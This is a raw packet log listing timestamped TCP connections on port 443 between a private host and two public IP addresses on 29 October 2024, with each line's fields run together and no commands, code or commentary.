                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.413537025 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.413606882 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.413619995 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.448513985 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.448602915 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.448611975 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.487557888 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.487584114 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.487665892 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.487678051 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.487725019 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.487744093 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.487767935 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.487988949 CET49791443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.488003969 CET44349791142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.936877966 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.936917067 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.937022924 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.937278986 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:15.937295914 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:16.813396931 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:16.813713074 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:16.813729048 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:16.814094067 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:16.814395905 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:16.814456940 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:16.814541101 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:16.814585924 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:16.814605951 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.086843014 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.086896896 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.086937904 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.087095976 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.087110996 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.087163925 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.087343931 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.140136957 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.140156984 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.140539885 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.140645981 CET44349792142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.140713930 CET49792443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.143588066 CET49793443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.143651962 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.143745899 CET49793443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.143965960 CET49793443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.143985033 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.144712925 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.144742966 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.144813061 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.145278931 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.145308971 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.145361900 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.145488977 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.145498991 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.145642042 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:17.145658970 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.017433882 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.018002987 CET49793443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.018027067 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.018364906 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.018671989 CET49793443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.018738031 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.018819094 CET49793443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.023268938 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.023462057 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.023478985 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.023816109 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.024085045 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.024138927 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.024171114 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.024229050 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.024252892 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.040761948 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.041017056 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.041033983 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.042459965 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.042538881 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.042870045 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.042937040 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.042994976 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.043000937 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.063329935 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.095494986 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.291671991 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.291723013 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.291763067 CET49793443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.291783094 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.309500933 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.309549093 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.309586048 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.309597015 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.309611082 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.309639931 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.309657097 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.309667110 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.309710026 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.310110092 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.310139894 CET44349795142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.310188055 CET49795443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.312544107 CET49796443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.312576056 CET44349796142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.312640905 CET49796443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.312938929 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.312975883 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.313030005 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.313163996 CET49796443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.313173056 CET44349796142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.313311100 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.313322067 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.313781023 CET49798443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.313818932 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.313868999 CET49798443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.314129114 CET49798443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.314138889 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.318460941 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.318511009 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.318551064 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.318557978 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.318842888 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.318877935 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.318886042 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.318891048 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.318922043 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.318927050 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.319824934 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.319852114 CET44349794142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.319901943 CET49794443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.321739912 CET49799443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.321763039 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.321834087 CET49799443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.322024107 CET49799443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.322033882 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.335099936 CET49793443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.335108042 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.335242987 CET49793443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.335274935 CET44349793142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:18.335321903 CET49793443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.163808107 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.164382935 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.164395094 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.165476084 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.165555954 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.165900946 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.165965080 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.166112900 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.166124105 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.166151047 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.166196108 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.183516979 CET44349796142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.183969975 CET49796443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.183990002 CET44349796142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.185075998 CET44349796142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.185271978 CET49796443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.185653925 CET49796443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.185710907 CET44349796142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.185888052 CET49796443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.185899973 CET44349796142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.188777924 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.189162970 CET49798443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.189191103 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.189615011 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.189979076 CET49798443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.190040112 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.190154076 CET49798443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.198035955 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.198453903 CET49799443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.198496103 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.198961973 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.199302912 CET49799443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.199394941 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.199471951 CET49799443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.212121010 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.228111029 CET49796443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.231340885 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.243340015 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.435354948 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.435409069 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.435436964 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.435476065 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.435477972 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.435487986 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.435590982 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.435604095 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.435647964 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.435653925 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.439374924 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.439424992 CET44349797142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.439516068 CET49797443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.442495108 CET49800443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.442537069 CET44349800142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.442605972 CET49800443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.442990065 CET49800443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.443002939 CET44349800142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.447734118 CET44349796142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.447890997 CET44349796142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.447994947 CET49796443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.448016882 CET44349796142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.448776960 CET49801443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.448816061 CET44349801142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.448816061 CET49796443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.448887110 CET49801443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.448889971 CET44349796142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.448945045 CET49796443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.449255943 CET49801443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.449275017 CET44349801142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.463454008 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.463628054 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.463696003 CET49798443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.463731050 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.463861942 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.463946104 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.464025974 CET49798443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.464044094 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.464096069 CET49798443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.464283943 CET49798443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.464360952 CET44349798142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.464416981 CET49798443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.466537952 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.466612101 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.466744900 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.466958046 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.466974020 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.467916965 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.467983007 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.468023062 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.468072891 CET49799443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.468091965 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.468168974 CET49799443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.468185902 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.515223980 CET49799443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.515237093 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.515564919 CET49799443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.515696049 CET44349799142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:19.515775919 CET49799443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.305562019 CET44349801142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.305953026 CET49801443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.305984974 CET44349801142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.307025909 CET44349801142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.307203054 CET49801443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.307466030 CET49801443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.307533979 CET44349801142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.307627916 CET49801443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.307637930 CET44349801142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.317426920 CET44349800142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.317717075 CET49800443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.317742109 CET44349800142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.318789005 CET44349800142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.318852901 CET49800443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.319216967 CET49800443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.319274902 CET44349800142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.319392920 CET49800443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.319400072 CET44349800142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.356107950 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.356422901 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.356443882 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.357497931 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.357662916 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.357862949 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.357923031 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.358050108 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.358057976 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.360085964 CET49801443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.361371994 CET49800443192.168.2.16142.250.186.68
